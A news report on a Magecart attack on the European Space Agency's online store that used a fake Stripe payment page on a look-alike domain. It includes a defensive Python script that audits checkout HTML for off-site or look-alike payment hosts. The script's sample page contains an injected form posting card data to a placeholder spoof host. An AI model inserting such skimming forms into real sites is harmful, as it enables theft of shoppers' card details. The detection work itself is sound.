Cybersecurity experts Sansec BV posted to the Bluesky social media platform, Dec. 23, to report that “Foreign espionage campaign launched via Christmas sweaters” in one of the more unusual cybersecurity announcements of 2024. A web application security specialist, Source Defense Research, took to X and confirmed that a live Magecart attack had taken place against the European Space Agency online store. Here’s what we know so far.

Hackers Leave European Space Agency Online Store Temporarily Out Of Orbit

If you fancied getting hold of some European Space Agency merchandise as a post-Christmas treat, then you are out of luck it would seem. Visit the ESA store currently and you’ll see a notice informing you that the site is “temporarily out of orbit for some exciting renovations.” While the humorous puns continue with visitors being asked to please fly by later, the real reason behind the downtime appears to be far more serious.

The X posting from Source Defense Research claimed that, while the ESA space shop site follows the latest Payment Card Industry Data Security Standard, PCI DSS 4.0, the hackers were able to exploit the fact that the shop uses Stripe to execute “a double-entry technique, faking Stripe’s page on the ESA site.”

Inserting A Fake Payment Page Into The European Space Agency Store—The Christmas Jumper Hack Explained

It would appear that a fake payment page was inserted into the checkout process, served from the ESA shop itself and, for all intents and purposes, looking like the genuine article. The Source Defense Research posting included screenshots showing the malicious payment page alongside the real one; the fake page relied on a domain-spoofing technique, using a look-alike domain with a different top-level domain.
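As an added illustration (not code from this article, Sansec or Source Defense), the following Python check shows how a store operator could audit their own checkout page for the pattern described above: it lists every form action, script source and iframe source that points off-site, and singles out hosts that reuse the Stripe name under a different top-level domain. The allowlist, the brand label and the sample HTML are assumptions constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist: hosts this checkout page may legitimately load payment code
# from or submit payment data to (a real store would maintain its own list).
ALLOWED_HOSTS = {"js.stripe.com", "checkout.stripe.com", "api.stripe.com"}
# Payment brand names whose look-alike hosts should be called out explicitly.
BRAND_LABELS = {"stripe"}


class PaymentRefCollector(HTMLParser):
    """Collect every URL through which a checkout page can ship data or pull code."""
    ATTRS = {"form": "action", "script": "src", "iframe": "src"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = self.ATTRS.get(tag)
        if wanted:
            for name, value in attrs:
                if name == wanted and value:
                    self.refs.append((tag, value))


def classify(host):
    """'allowed' for known payment hosts, 'lookalike' for brand-name spoofs, else 'unknown'."""
    if host in ALLOWED_HOSTS:
        return "allowed"
    # A host carrying the brand name but not on the allowlist (e.g. the same name
    # under another TLD) is the fake-Stripe-page pattern described in the article.
    if any(brand in label for brand in BRAND_LABELS for label in host.split(".")):
        return "lookalike"
    return "unknown"


def audit_checkout_html(html):
    """Return (tag, host, verdict) for every off-site reference that is not allowlisted."""
    parser = PaymentRefCollector()
    parser.feed(html)
    findings = []
    for tag, url in parser.refs:
        host = urlsplit(url).hostname
        if host is None:  # relative URL: served by the shop itself, nothing to flag here
            continue
        verdict = classify(host.lower())
        if verdict != "allowed":
            findings.append((tag, host, verdict))
    return findings


# Constructed sample page: the genuine Stripe loader plus an injected form that posts
# card data to a look-alike host under the reserved .test TLD (placeholder, not a real IoC).
SAMPLE_CHECKOUT = """
<script src="https://js.stripe.com/v3/"></script>
<form action="/cart/update"><input name="qty"></form>
<form action="https://checkout.stripe.test/pay"><input name="card"></form>
<iframe src="https://cdn.static.test/widget"></iframe>
"""

if __name__ == "__main__":
    for tag, host, verdict in audit_checkout_html(SAMPLE_CHECKOUT):
        print(f"{verdict:9} <{tag}> -> {host}")
```

Run this against a saved copy of the checkout page; any "lookalike" line is exactly the kind of second, fake payment form a shopper would never notice.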

I have reached out to both the European Space Agency and Stripe for a statement. In the meantime, however, it has been reported that ESA has “clarified that the store operates on third-party infrastructure, and the agency does not manage its data,” so the extent to which this hack impacts ESA data itself is likely to be minimal, if at all. Instead, it looks like it was most likely an opportunistic criminal attack with a pure profit motive.
